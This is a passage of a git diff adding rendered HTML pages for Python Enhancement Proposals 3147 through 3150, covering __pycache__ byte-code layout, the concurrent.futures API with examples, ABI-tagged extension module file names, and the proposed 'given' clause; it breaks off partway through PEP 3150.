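+'foo.py'
+>>> foo.__cached__
+'__pycache__/foo.cpython-32.pyc'
+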

For alternative Python implementations which do not support pyc +files, the __cached__ attribute may point to whatever information +makes sense. E.g. on Jython, this might be the .class file for the +module: __pycache__/foo.jython-32.class. Some implementations may +use multiple compiled files to create the module, in which case +__cached__ may be a tuple. The exact contents of __cached__ are +Python implementation specific.

+

It is recommended that when nothing sensible can be calculated, +implementations should set the __cached__ attribute to None.

+
+
+

py_compile and compileall

+

Python comes with two modules, py_compile [15] and compileall +[16] which support compiling Python modules external to the built-in +import machinery. py_compile in particular has intimate knowledge +of byte compilation, so these will be updated to understand the new +layout. The -b flag is added to compileall for writing legacy +.pyc byte-compiled file path names.

+
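A sketch of what the updated py_compile default would look like, based on the layout described in this PEP (the return value shown is an assumption about the updated API):

+
>>> import py_compile
+>>> py_compile.compile('alpha/one.py')
+'alpha/__pycache__/one.cpython-32.pyc'
+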
+
+

bdist_wininst and the Windows installer

+

These tools also compile modules explicitly on installation. If they +do not use py_compile and compileall, then they would also have to +be modified to understand the new layout.

+
+
+

File extension checks

+

There exists some code which checks for files ending in .pyc and +simply chops off the last character to find the matching .py file. +This code will obviously fail once this PEP is implemented.

+

To support this use case, we’ll add two new functions to the imp module [17]:

+
    +
  • imp.cache_from_source(py_path) -> pyc_path
  • +
  • imp.source_from_cache(pyc_path) -> py_path
  • +
+

Alternative implementations are free to override these functions to +return reasonable values based on their own support for this PEP. +These methods are allowed to return None when the implementation (or +PEP 302 loader in effect) for whatever reason cannot calculate +the appropriate file name. They should not raise exceptions.

+
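A sketch of the intended round-tripping behavior for these functions, using the paths and tag from the examples earlier in this PEP (exact return values are an assumption):

+
>>> import imp
+>>> imp.cache_from_source('alpha/one.py')
+'alpha/__pycache__/one.cpython-32.pyc'
+>>> imp.source_from_cache('alpha/__pycache__/one.cpython-32.pyc')
+'alpha/one.py'
+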
+
+

Backports

+

For versions of Python earlier than 3.2 (and possibly 2.7), it is +possible to backport this PEP. However, in Python 3.2 (and possibly +2.7), this behavior will be turned on by default, and in fact, it will +replace the old behavior. Backports will need to support the old +layout by default. We suggest supporting PEP 3147 through the use of +an environment variable called $PYTHONENABLECACHEDIR or the command +line switch -Xenablecachedir to enable the feature.

+
+
+

Makefiles and other dependency tools

+

Makefiles and other tools which calculate dependencies on .pyc files +(e.g. to byte-compile the source if the .pyc is missing) will have +to be updated to check the new paths.

+
+
+
+

Alternatives

+

This section describes some alternative approaches or details that +were considered and rejected during the PEP’s development.

+
+

Hexadecimal magic tags

+

pyc files inside of the __pycache__ directories contain a magic tag +in their file names. These are mnemonic tags for the actual magic +numbers used by the importer. We could have used the hexadecimal +representation [10] of the binary magic number as a unique +identifier. For example, in Python 3.2:

+
>>> from binascii import hexlify
+>>> from imp import get_magic
+>>> 'foo.{}.pyc'.format(hexlify(get_magic()).decode('ascii'))
+'foo.580c0d0a.pyc'
+
+
+

This isn’t particularly human friendly though, thus the magic tag +proposed in this PEP.

+
+
+

PEP 304

+

There is some overlap between the goals of this PEP and PEP 304, which has been withdrawn. However PEP 304 would allow a user to create a shadow file system hierarchy in which to store pyc files. This concept of a shadow hierarchy for pyc files could be used to satisfy the aims of this PEP. Although PEP 304 does not indicate why it was withdrawn, shadow directories have a number of problems. The location of the shadow pyc files would not be easily discovered and would depend on the proper and consistent use of the $PYTHONBYTECODE environment variable both by the system and by end users. There are also global implications, meaning that while the system might want to shadow pyc files, users might not want to, but the PEP defines only an all-or-nothing approach.

+

As an example of the problem, a common (though fragile) Python idiom +for locating data files is to do something like this:

+
from os import dirname, join
+import foo.bar
+data_file = join(dirname(foo.bar.__file__), 'my.dat')
+
+
+

This would be problematic since foo.bar.__file__ will give the +location of the pyc file in the shadow directory, and it may not be +possible to find the my.dat file relative to the source directory +from there.

+
+
+

Fat byte compilation files

+

An earlier version of this PEP described “fat” Python byte code files. +These files would contain the equivalent of multiple pyc files in a +single pyf file, with a lookup table keyed off the appropriate magic +number. This was an extensible file format so that the first 5 +parallel Python implementations could be supported fairly efficiently, +but with extension lookup tables available to scale pyf byte code +objects as large as necessary.

+

The fat byte compilation files were fairly complex, and inherently +introduced difficult race conditions, so the current simplification of +using directories was suggested. The same problem applies to using +zip files as the fat pyc file format.

+
+
+

Multiple file extensions

+

The PEP author also considered an approach where multiple thin byte +compiled files lived in the same place, but used different file +extensions to designate the Python version. E.g. foo.pyc25, +foo.pyc26, foo.pyc31 etc. This was rejected because of the clutter +involved in writing so many different files. The multiple extension +approach makes it more difficult (and an ongoing task) to update any +tools that are dependent on the file extension.

+
+
+

.pyc

+

A proposal was floated to call the __pycache__ directory .pyc or +some other dot-file name. This would have the effect on *nix systems +of hiding the directory. There are many reasons why this was +rejected by the BDFL [20] including the fact that dot-files are only +special on some platforms, and we actually do not want to hide these +completely from users.

+
+
+
+

Reference implementation

+

Work on this code is tracked in a Bazaar branch on Launchpad [22] +until it’s ready for merge into Python 3.2. The work-in-progress diff +can also be viewed [23] and is updated automatically as new changes +are uploaded.

+

A Rietveld code review issue [24] has been opened as of 2010-04-01 (no, +this is not an April Fools joke :).

+
+
+

References

+ +

[21] importlib: https://docs.python.org/3.1/library/importlib.html

+ +
+
+

ACKNOWLEDGMENTS

+

Barry Warsaw’s original idea was for fat Python byte code files. Martin von Löwis reviewed an early draft of the PEP and suggested the simplification to store traditional pyc and pyo files in a directory. Many other people reviewed early versions of this PEP and provided useful feedback including but not limited to:

+
    +
  • David Malcolm
  • +
  • Josselin Mouette
  • +
  • Matthias Klose
  • +
  • Michael Hudson
  • +
  • Michael Vogt
  • +
  • Piotr Ożarowski
  • +
  • Scott Kitterman
  • +
  • Toshio Kuratomi
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3147.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-3148/index.html b/pep-3148/index.html new file mode 100644 index 00000000000..67a97644511 --- /dev/null +++ b/pep-3148/index.html @@ -0,0 +1,594 @@
PEP 3148 – futures - execute computations asynchronously | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3148 – futures - execute computations asynchronously

+
+
Author:
+
Brian Quinlan <brian at sweetapp.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Oct-2009
+
Python-Version:
+
3.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a design for a package that facilitates the +evaluation of callables using threads and processes.

+
+
+

Motivation

+

Python currently has powerful primitives to construct multi-threaded and multi-process applications but parallelizing simple operations requires a lot of work, i.e. explicitly launching processes/threads, constructing a work/results queue, and waiting for completion or some other termination condition (e.g. failure, timeout). It is also difficult to design an application with a global process/thread limit when each component invents its own parallel execution strategy.

+
+
+

Specification

+
+

Naming

+

The proposed package would be called “futures” and would live in a new “concurrent” top-level package. The rationale behind pushing the futures library into a “concurrent” namespace has multiple components. The first, and simplest, is to prevent any and all confusion with the existing “from __future__ import x” idiom which has been in use for a long time within Python. Additionally, it is felt that adding the “concurrent” precursor to the name fully denotes what the library is related to - namely concurrency - and this should clear up any additional ambiguity, as it has been noted that not everyone in the community is familiar with Java Futures, or the Futures term except as it relates to the US stock market.

+

Finally, we are carving out a new namespace for the standard library - obviously named “concurrent”. We hope to either add, or move existing, concurrency-related libraries to this in the future. A prime example is the multiprocessing.Pool work, as well as other “addons” included in that module, which work across thread and process boundaries.

+
+
+

Interface

+

The proposed package provides two core classes: Executor and +Future. An Executor receives asynchronous work requests (in terms +of a callable and its arguments) and returns a Future to represent +the execution of that work request.

+
+

Executor

+

Executor is an abstract class that provides methods to execute calls +asynchronously.

+

submit(fn, *args, **kwargs)

+
+
Schedules the callable to be executed as fn(*args, **kwargs) +and returns a Future instance representing the execution of the +callable.

This is an abstract method and must be implemented by Executor +subclasses.

+
+

map(func, *iterables, timeout=None)

+
+
Equivalent to map(func, *iterables) but func is executed +asynchronously and several calls to func may be made concurrently. +The returned iterator raises a TimeoutError if __next__() is +called and the result isn’t available after timeout seconds from +the original call to map(). If timeout is not specified or +None then there is no limit to the wait time. If a call raises +an exception then that exception will be raised when its value is +retrieved from the iterator.
+

shutdown(wait=True)

+
+
Signal the executor that it should free any resources that it is using when the currently pending futures are done executing. Calls to Executor.submit and Executor.map made after shutdown will raise RuntimeError.

If wait is True then this method will not return until all the +pending futures are done executing and the resources associated +with the executor have been freed. If wait is False then this +method will return immediately and the resources associated with +the executor will be freed when all pending futures are done +executing. Regardless of the value of wait, the entire Python +program will not exit until all pending futures are done +executing.

+
+
+
__enter__()
+
__exit__(exc_type, exc_val, exc_tb)
+
+
+
When using an executor as a context manager, __exit__ will call +Executor.shutdown(wait=True).
+
+
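For example, the following sketch uses an executor as a context manager so that shutdown(wait=True) is called implicitly when the block exits, guaranteeing all submitted calls have finished (square is an illustrative helper, not part of the API):

+
from concurrent import futures
+
+def square(x):
+    return x * x
+
+with futures.ThreadPoolExecutor(max_workers=4) as executor:
+    fs = [executor.submit(square, i) for i in range(10)]
+
+# The with block has called shutdown(wait=True), so all futures are done.
+results = [f.result() for f in fs]
+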
+

ProcessPoolExecutor

+

The ProcessPoolExecutor class is an Executor subclass that uses a +pool of processes to execute calls asynchronously. The callable +objects and arguments passed to ProcessPoolExecutor.submit must be +pickleable according to the same limitations as the multiprocessing +module.

+

Calling Executor or Future methods from within a callable +submitted to a ProcessPoolExecutor will result in deadlock.

+

__init__(max_workers)

+
+
Executes calls asynchronously using a pool of at most max_workers processes. If max_workers is None or not given then as many worker processes will be created as the machine has processors.
+
+
+

ThreadPoolExecutor

+

The ThreadPoolExecutor class is an Executor subclass that uses a +pool of threads to execute calls asynchronously.

+

Deadlock can occur when the callable associated with a Future waits +on the results of another Future. For example:

+
from concurrent.futures import ThreadPoolExecutor
+import time
+
+def wait_on_b():
+    time.sleep(5)
+    print(b.result())  # b will never complete because it is waiting on a.
+    return 5
+
+def wait_on_a():
+    time.sleep(5)
+    print(a.result())  # a will never complete because it is waiting on b.
+    return 6
+
+
+executor = ThreadPoolExecutor(max_workers=2)
+a = executor.submit(wait_on_b)
+b = executor.submit(wait_on_a)
+
+
+

And:

+
from concurrent.futures import ThreadPoolExecutor
+
+def wait_on_future():
+    f = executor.submit(pow, 5, 2)
+    # This will never complete because there is only one worker thread and
+    # it is executing this function.
+    print(f.result())
+
+executor = ThreadPoolExecutor(max_workers=1)
+executor.submit(wait_on_future)
+
+
+

__init__(max_workers)

+
+
Executes calls asynchronously using a pool of at most +max_workers threads.
+
+
+

Future Objects

+

The Future class encapsulates the asynchronous execution of a +callable. Future instances are returned by Executor.submit.

+

cancel()

+
+
Attempt to cancel the call. If the call is currently being +executed then it cannot be cancelled and the method will return +False, otherwise the call will be cancelled and the method will +return True.
+

cancelled()

+
+
Return True if the call was successfully cancelled.
+

running()

+
+
Return True if the call is currently being executed and cannot +be cancelled.
+

done()

+
+
Return True if the call was successfully cancelled or finished +running.
+

result(timeout=None)

+
+
Return the value returned by the call. If the call hasn’t yet +completed then this method will wait up to timeout seconds. If +the call hasn’t completed in timeout seconds then a +TimeoutError will be raised. If timeout is not specified or +None then there is no limit to the wait time.

If the future is cancelled before completing then CancelledError +will be raised.

+

If the call raised then this method will raise the same exception.

+
+

exception(timeout=None)

+
+
Return the exception raised by the call. If the call hasn’t yet +completed then this method will wait up to timeout seconds. If +the call hasn’t completed in timeout seconds then a +TimeoutError will be raised. If timeout is not specified or +None then there is no limit to the wait time.

If the future is cancelled before completing then CancelledError +will be raised.

+

If the call completed without raising then None is returned.

+
+

add_done_callback(fn)

+
+
Attaches a callable fn to the future that will be called when +the future is cancelled or finishes running. fn will be called +with the future as its only argument.

Added callables are called in the order that they were added and +are always called in a thread belonging to the process that added +them. If the callable raises an Exception then it will be +logged and ignored. If the callable raises another +BaseException then behavior is not defined.

+

If the future has already completed or been cancelled then fn +will be called immediately.

+
+
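A minimal sketch of attaching a completion callback (report is an illustrative helper, not part of the API):

+
from concurrent import futures
+
+def report(future):
+    # Called with the future as its only argument, in a thread
+    # belonging to the process that added the callback.
+    print('result:', future.result())
+
+with futures.ThreadPoolExecutor(max_workers=1) as executor:
+    f = executor.submit(pow, 2, 10)
+    f.add_done_callback(report)
+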
+
Internal Future Methods
+

The following Future methods are meant for use in unit tests and +Executor implementations.

+

set_running_or_notify_cancel()

+
+
Should be called by Executor implementations before executing +the work associated with the Future.

If the method returns False then the Future was cancelled, +i.e. Future.cancel was called and returned True. Any threads +waiting on the Future completing (i.e. through as_completed() +or wait()) will be woken up.

+

If the method returns True then the Future was not cancelled +and has been put in the running state, i.e. calls to +Future.running() will return True.

+

This method can only be called once and cannot be called after +Future.set_result() or Future.set_exception() have been +called.

+
+

set_result(result)

+
+
Sets the result of the work associated with the Future.
+

set_exception(exception)

+
+
Sets the result of the work associated with the Future to the +given Exception.
+
+
+
+

Module Functions

+

wait(fs, timeout=None, return_when=ALL_COMPLETED)

+
+
Wait for the Future instances (possibly created by different +Executor instances) given by fs to complete. Returns a named +2-tuple of sets. The first set, named “done”, contains the +futures that completed (finished or were cancelled) before the +wait completed. The second set, named “not_done”, contains +uncompleted futures.

timeout can be used to control the maximum number of seconds to +wait before returning. If timeout is not specified or None then +there is no limit to the wait time.

+

return_when indicates when the method should return. It must be +one of the following constants:

+ + + + + + + + + + + + + + + + + +
Constant: Description
FIRST_COMPLETED: The method will return when any future finishes or is cancelled.
FIRST_EXCEPTION: The method will return when any future finishes by raising an exception. If no future raises an exception then it is equivalent to ALL_COMPLETED.
ALL_COMPLETED: The method will return when all calls finish.
+
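A sketch of waiting for the first completed future out of a batch, using the constants described above:

+
from concurrent import futures
+
+with futures.ThreadPoolExecutor(max_workers=2) as executor:
+    fs = [executor.submit(pow, 2, n) for n in range(8)]
+    done, not_done = futures.wait(
+        fs, timeout=5, return_when=futures.FIRST_COMPLETED)
+    # "done" holds at least one finished future; the remainder
+    # will still complete before the with block exits.
+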
+

as_completed(fs, timeout=None)

+
+
Returns an iterator over the Future instances given by fs that +yields futures as they complete (finished or were cancelled). Any +futures that completed before as_completed() was called will be +yielded first. The returned iterator raises a TimeoutError if +__next__() is called and the result isn’t available after +timeout seconds from the original call to as_completed(). If +timeout is not specified or None then there is no limit to the +wait time.

The Future instances can have been created by different +Executor instances.

+
+
+
+
+

Check Prime Example

+
from concurrent import futures
+import math
+
+PRIMES = [
+    112272535095293,
+    112582705942171,
+    112272535095293,
+    115280095190773,
+    115797848077099,
+    1099726899285419]
+
+def is_prime(n):
+    if n % 2 == 0:
+        return False
+
+    sqrt_n = int(math.floor(math.sqrt(n)))
+    for i in range(3, sqrt_n + 1, 2):
+        if n % i == 0:
+            return False
+    return True
+
+def main():
+    with futures.ProcessPoolExecutor() as executor:
+        for number, prime in zip(PRIMES, executor.map(is_prime,
+                                                      PRIMES)):
+            print('%d is prime: %s' % (number, prime))
+
+if __name__ == '__main__':
+    main()
+
+
+
+
+

Web Crawl Example

+
from concurrent import futures
+import urllib.request
+
+URLS = ['http://www.foxnews.com/',
+        'http://www.cnn.com/',
+        'http://europe.wsj.com/',
+        'http://www.bbc.co.uk/',
+        'http://some-made-up-domain.com/']
+
+def load_url(url, timeout):
+    return urllib.request.urlopen(url, timeout=timeout).read()
+
+def main():
+    with futures.ThreadPoolExecutor(max_workers=5) as executor:
+        future_to_url = dict(
+            (executor.submit(load_url, url, 60), url)
+             for url in URLS)
+
+        for future in futures.as_completed(future_to_url):
+            url = future_to_url[future]
+            try:
+                print('%r page is %d bytes' % (
+                          url, len(future.result())))
+            except Exception as e:
+                print('%r generated an exception: %s' % (
+                          url, e))
+
+if __name__ == '__main__':
+    main()
+
+
+
+
+
+

Rationale

+

The proposed design of this module was heavily influenced by the +Java java.util.concurrent package [1]. The conceptual basis of the +module, as in Java, is the Future class, which represents the progress +and result of an asynchronous computation. The Future class makes +little commitment to the evaluation mode being used e.g. it can be +used to represent lazy or eager evaluation, for evaluation using +threads, processes or remote procedure call.

+

Futures are created by concrete implementations of the Executor class +(called ExecutorService in Java). The reference implementation +provides classes that use either a process or a thread pool to eagerly +evaluate computations.

+

Futures have already been seen in Python as part of a popular Python cookbook recipe [2] and have been discussed on the Python-3000 mailing list [3].

+

The proposed design is explicit, i.e. it requires that clients be +aware that they are consuming Futures. It would be possible to design +a module that would return proxy objects (in the style of weakref) +that could be used transparently. It is possible to build a proxy +implementation on top of the proposed explicit mechanism.

+

The proposed design does not introduce any changes to Python language +syntax or semantics. Special syntax could be introduced [4] to mark +function and method calls as asynchronous. A proxy result would be +returned while the operation is eagerly evaluated asynchronously, and +execution would only block if the proxy object were used before the +operation completed.

+

Anh Hai Trinh proposed a simpler but more limited API concept [5] and +the API has been discussed in some detail on stdlib-sig [6].

+

The proposed design was discussed on the Python-Dev mailing list [7]. +Following those discussions, the following changes were made:

+
    +
  • The Executor class was made into an abstract base class
  • +
  • The Future.remove_done_callback method was removed due to a lack +of convincing use cases
  • +
  • The Future.add_done_callback method was modified to allow the +same callable to be added many times
  • +
  • The Future class’s mutation methods were better documented to +indicate that they are private to the Executor that created them
  • +
+
+
+

Reference Implementation

+

The reference implementation [8] contains a complete implementation +of the proposed design. It has been tested on Linux and Mac OS X.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3148.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-3149/index.html b/pep-3149/index.html new file mode 100644 index 00000000000..42cd07a7664 --- /dev/null +++ b/pep-3149/index.html @@ -0,0 +1,426 @@
PEP 3149 – ABI version tagged .so files | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3149 – ABI version tagged .so files

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Jul-2010
+
Python-Version:
+
3.2
+
Post-History:
+
14-Jul-2010, 22-Jul-2010
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 3147 described an extension to Python’s import machinery that +improved the sharing of Python source code, by allowing more than one +byte compilation file (.pyc) to be co-located with each source file.

+

This PEP defines an adjunct feature which allows the co-location of +extension module files (.so) in a similar manner. This optional, +build-time feature will enable downstream distributions of Python to +more easily provide more than one Python major version at a time.

+
+
+

Background

+

PEP 3147 defined the file system layout for a pure-Python package, +where multiple versions of Python are available on the system. For +example, where the alpha package containing source modules one.py +and two.py exist on a system with Python 3.2 and 3.3, the post-byte +compilation file system layout would be:

+
alpha/
+    __pycache__/
+        __init__.cpython-32.pyc
+        __init__.cpython-33.pyc
+        one.cpython-32.pyc
+        one.cpython-33.pyc
+        two.cpython-32.pyc
+        two.cpython-33.pyc
+    __init__.py
+    one.py
+    two.py
+
+
+

For packages with extension modules, a similar differentiation is needed for the module’s .so files. Extension modules compiled for different Python major versions are incompatible with each other due to changes in the ABI. Different configuration/compilation options for the same Python version can result in different ABIs (e.g. --with-wide-unicode).

+

While PEP 384 defines a stable ABI, it will minimize, but not eliminate, extension module incompatibilities between Python builds or major versions. Thus a mechanism for discriminating extension module file names is proposed.

+
+
+

Rationale

+

Linux distributions such as Ubuntu [3] and Debian [4] provide more +than one Python version at the same time to their users. For example, +Ubuntu 9.10 Karmic Koala users can install Python 2.5, 2.6, and 3.1, +with Python 2.6 being the default.

+

In order to share as much as possible between the available Python versions, these distributions install third party package modules (.pyc and .so files) into /usr/share/pyshared and symlink to them from /usr/lib/pythonX.Y/dist-packages. The symlinks exist because in a pre-PEP 3147 world (i.e. < Python 3.2), the .pyc files resulting from byte compilation by the various installed Pythons will name collide with each other. For Python versions >= 3.2, all pure-Python packages can be shared, because the .pyc files will no longer cause file system naming conflicts. Eliminating these symlinks makes for a simpler, more robust Python distribution.

+

A similar situation arises with shared library extensions. Because +extension modules are typically named foo.so for a foo extension +module, these would also name collide if foo was provided for more +than one Python version.

+

In addition, different configuration/compilation options for the same Python version can cause different ABIs to be presented to extension modules. On POSIX systems for example, the configure options --with-pydebug, --with-pymalloc, and --with-wide-unicode all change the ABI. This PEP proposes to encode build-time options in the file name of the .so extension module files.

+

PyPy [5] can also benefit from this PEP, allowing it to avoid name +collisions in extension modules built for its API, but with a +different .so tag.

+
+
+

Proposal

+

The configure/compilation options chosen at Python interpreter build-time will be encoded in the shared library file name for extension modules. This “tag” will appear between the module base name and the operating system’s file extension for shared libraries.

+

The following information MUST be included in the shared library +file name:

+
    +
  • The Python implementation (e.g. cpython, pypy, jython, etc.)
  • +
  • The interpreter’s major and minor version numbers
  • +
+

These two fields are separated by a hyphen and no dots are to appear +between the major and minor version numbers. E.g. cpython-32.

+

Python implementations MAY include additional flags in the file name +tag as appropriate. For example, on POSIX systems these flags will +also contribute to the file name:

+
    +
  • --with-pydebug (flag: d)
  • +
  • --with-pymalloc (flag: m)
  • +
  • --with-wide-unicode (flag: u)
  • +
+

By default in Python 3.2, configure enables --with-pymalloc so +shared library file names would appear as foo.cpython-32m.so. +When the other two flags are also enabled, the file names would be +foo.cpython-32dmu.so.

+

The shared library file name tag is used unconditionally; it cannot be changed. The tag and extension module suffix are available through the sysconfig module via the following variables:

+
>>> sysconfig.get_config_var('EXT_SUFFIX')
+'.cpython-32mu.so'
+>>> sysconfig.get_config_var('SOABI')
+'cpython-32mu'
+
+
+

Note that $SOABI contains just the tag, while $EXT_SUFFIX includes the +platform extension for shared library files, and is the exact suffix +added to the extension module name.

+
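Combining the two values, the full tagged file name for an extension module foo can be derived directly (values match the example above):

+
>>> import sysconfig
+>>> 'foo' + sysconfig.get_config_var('EXT_SUFFIX')
+'foo.cpython-32mu.so'
+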

For an arbitrary package foo, you might see these files when the +distribution package was installed:

+
/usr/lib/python/foo.cpython-32m.so
+/usr/lib/python/foo.cpython-33m.so
+
+
+

(These paths are for example purposes only. Distributions are free to +use whatever filesystem layout they choose, and nothing in this PEP +changes the locations where from-source builds of Python are +installed.)

+

Python’s dynamic module loader will recognize and import shared +library extension modules with a tag that matches its build-time +options. For backward compatibility, Python will also continue to +import untagged extension modules, e.g. foo.so.

+

This shared library tag would be used globally for all distutils-based extension modules, regardless of where on the file system they are built. Extension modules built by means other than distutils would either have to calculate the tag manually, or fall back to the non-tagged .so file name.

+
+
+

Proven approach

+

The approach described here is already proven, in a sense, on Debian and Ubuntu systems where different extensions are used for debug builds of Python and extension modules. Debug builds on Windows also already use a different file extension for dynamic libraries, and in fact encode (in a different way than proposed in this PEP) the Python major and minor version in the .dll file name.

+
+
+

Windows

+

This PEP only addresses build issues on POSIX systems that use the +configure script. While Windows or other platform support is not +explicitly disallowed under this PEP, platform expertise is needed in +order to evaluate, describe, and implement support on such platforms. +It is not currently clear that the facilities in this PEP are even +useful for Windows.

+
+
+

PEP 384

+

PEP 384 defines a stable ABI for extension modules. In theory, +universal adoption of PEP 384 would eliminate the need for this PEP +because all extension modules could be compatible with any Python +version. In practice of course, it will be impossible to achieve +universal adoption, and as described above, different build-time flags +still affect the ABI. Thus even with a stable ABI, this PEP may still +be necessary. While a complete specification is reserved for PEP 384, +here is a discussion of the relevant issues.

+

PEP 384 describes a change to PyModule_Create() where 3 is +passed as the API version if the extension was compiled with +Py_LIMITED_API. This should be formalized into an official macro +called PYTHON_ABI_VERSION to mirror PYTHON_API_VERSION. If +and when the ABI changes in an incompatible way, this version number +would be bumped. To facilitate sharing, Python would be extended to +search for extension modules with the PYTHON_ABI_VERSION number in +its name. The prefix abi is reserved for Python’s use.

+

Thus, an initial implementation of PEP 384, when Python is configured +with the default set of flags, would search for the following file +names when extension module foo is imported (in this order):

+
foo.cpython-XYm.so
+foo.abi3.so
+foo.so
+
+
+

The distutils [6] build_ext command would also have to be +extended to compile to shared library files with the abi3 tag, +when the module author indicates that their extension supports that +version of the ABI. This could be done in a backward compatible way +by adding a keyword argument to the Extension class, such as:

+
Extension('foo', ['foo.c'], abi=3)
+
+
+

Martin v. Löwis describes his thoughts [7] about the applicability of this +PEP to PEP 384. In summary:

+
    +
  • --with-pydebug would not be supported by the stable ABI because +this changes the layout of PyObject, which is an exposed +structure.
  • +
  • --with-pymalloc has no bearing on the issue.
  • +
  • --with-wide-unicode is trickier, though Martin’s inclination is +to force the stable ABI to use a Py_UNICODE that matches the +platform’s wchar_t.
  • +
+
+
+

Alternatives

+

In the initial python-dev thread [8] where this idea was first +introduced, several alternatives were suggested. For completeness +they are listed here, along with the reasons for not adopting them.

+ +
+

Don’t share packages with extension modules

+

It has been suggested that Python packages with extension modules not +be shared among all supported Python versions on a distribution. Even +with adoption of PEP 3149, extension modules will have to be compiled +for every supported Python version, so perhaps sharing of such +packages isn’t useful anyway. Not sharing packages with extensions +though is infeasible for several reasons.

+

If a pure-Python package is shared in one version, should it suddenly +be not-shared if the next release adds an extension module for speed? +Also, even though all extension shared libraries will be compiled and +distributed once for every supported Python, there’s a big difference +between duplicating the .so files and duplicating all .py files. +The extra size increases the download time for such packages, and more +immediately, increases the space pressures on already constrained +distribution CD-ROMs.

+
+
+
+

Reference implementation

+

Work on this code is tracked in a Bazaar branch on Launchpad [9] +until it’s ready for merge into Python 3.2. The work-in-progress diff +can also be viewed [10] and is updated automatically as new changes +are uploaded.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3149.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-3150/index.html b/pep-3150/index.html new file mode 100644 index 00000000000..ca8ed65cf4e --- /dev/null +++ b/pep-3150/index.html @@ -0,0 +1,882 @@
PEP 3150 – Statement local namespaces (aka “given” clause) | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3150 – Statement local namespaces (aka “given” clause)

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
09-Jul-2010
+
Python-Version:
+
3.4
+
Post-History:
+
14-Jul-2010, 21-Apr-2011, 13-Jun-2011
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the addition of an optional given clause to several +Python statements that do not currently have an associated code suite. This +clause will create a statement local namespace for additional names that are +accessible in the associated statement, but do not become part of the +containing namespace.

+

Adoption of a new symbol, ?, is proposed to denote a forward reference +to the namespace created by running the associated code suite. It will be +a reference to a types.SimpleNamespace object.

+

The primary motivation is to enable a more declarative style of programming, +where the operation to be performed is presented to the reader first, and the +details of the necessary subcalculations are presented in the following +indented suite. As a key example, this would elevate ordinary assignment +statements to be on par with class and def statements where the name +of the item to be defined is presented to the reader in advance of the +details of how the value of that item is calculated. It also allows named +functions to be used in a “multi-line lambda” fashion, where the name is used +solely as a placeholder in the current expression and then defined in the +following suite.

+

A secondary motivation is to simplify interim calculations in module and +class level code without polluting the resulting namespaces.

+

The intent is that the relationship between a given clause and a separate +function definition that performs the specified operation will be similar to +the existing relationship between an explicit while loop and a generator that +produces the same sequence of operations as that while loop.

+

The specific proposal in this PEP has been informed by various explorations +of this and related concepts over the years (e.g. [1], [2], [3], [6], +[8]), and is inspired to some degree by the where and let clauses in +Haskell. It avoids some problems that have been identified in past proposals, +but has not yet itself been subject to the test of implementation.

+
+
+

Proposal

+

This PEP proposes the addition of an optional given clause to the +syntax for simple statements which may contain an expression, or may +substitute for such a statement for purely syntactic purposes. The +current list of simple statements that would be affected by this +addition is as follows:

+
    +
  • expression statement
  • +
  • assignment statement
  • +
  • augmented assignment statement
  • +
  • del statement
  • +
  • return statement
  • +
  • yield statement
  • +
  • raise statement
  • +
  • assert statement
  • +
  • pass statement
  • +
+

The given clause would allow subexpressions to be referenced by +name in the header line, with the actual definitions following in +the indented clause. As a simple example:

+
sorted_data = sorted(data, key=?.sort_key) given:
+    def sort_key(item):
+        return item.attr1, item.attr2
+
+
+

The new symbol ? is used to refer to the given namespace. It would be a +types.SimpleNamespace instance, so ?.sort_key functions as +a forward reference to a name defined in the given clause.

+

A docstring would be permitted in the given clause, and would be attached +to the result namespace as its __doc__ attribute.

+

The pass statement is included to provide a consistent way to skip +inclusion of a meaningful expression in the header line. While this is not +an intended use case, it isn’t one that can be prevented as multiple +alternatives (such as ... and ()) remain available even if pass +itself is disallowed.

+

The body of the given clause will execute in a new scope, using normal +function closure semantics. To support early binding of loop variables +and global references, as well as to allow access to other names defined at +class scope, the given clause will also allow explicit +binding operations in the header line:

+
# Explicit early binding via given clause
+seq = []
+for i in range(10):
+    seq.append(?.f) given i=i in:
+        def f():
+            return i
+assert [f() for f in seq] == list(range(10))
+
+
+
+

Semantics

+

The following statement:

+
op(?.f, ?.g) given bound_a=a, bound_b=b in:
+    def f():
+        return bound_a + bound_b
+    def g():
+        return bound_a - bound_b
+
+
+

Would be roughly equivalent to the following code (__var denotes a +hidden compiler variable or simply an entry on the interpreter stack):

+
__arg1 = a
+__arg2 = b
+def __scope(bound_a, bound_b):
+    def f():
+        return bound_a + bound_b
+    def g():
+        return bound_a - bound_b
+    return types.SimpleNamespace(**locals())
+__ref = __scope(__arg1, __arg2)
+__ref.__doc__ = __scope.__doc__
+op(__ref.f, __ref.g)
+
+
+

A given clause is essentially a nested function which is created and +then immediately executed. Unless explicitly passed in, names are looked +up using normal scoping rules, and thus names defined at class scope will +not be visible. Names declared as forward references are returned and +used in the header statement, without being bound locally in the +surrounding namespace.

+
+
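Since the given clause does not yet exist, the expansion above can be emulated with current Python (types.SimpleNamespace is available from Python 3.3) to check the intended semantics; __scope is spelled _given here to keep the sketch importable:

+
import types
+
+def _given(bound_a, bound_b):
+    def f():
+        return bound_a + bound_b
+    def g():
+        return bound_a - bound_b
+    return types.SimpleNamespace(**locals())
+
+ref = _given(3, 2)
+assert (ref.f(), ref.g()) == (5, 1)
+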
+

Syntax Change

+

Current:

+
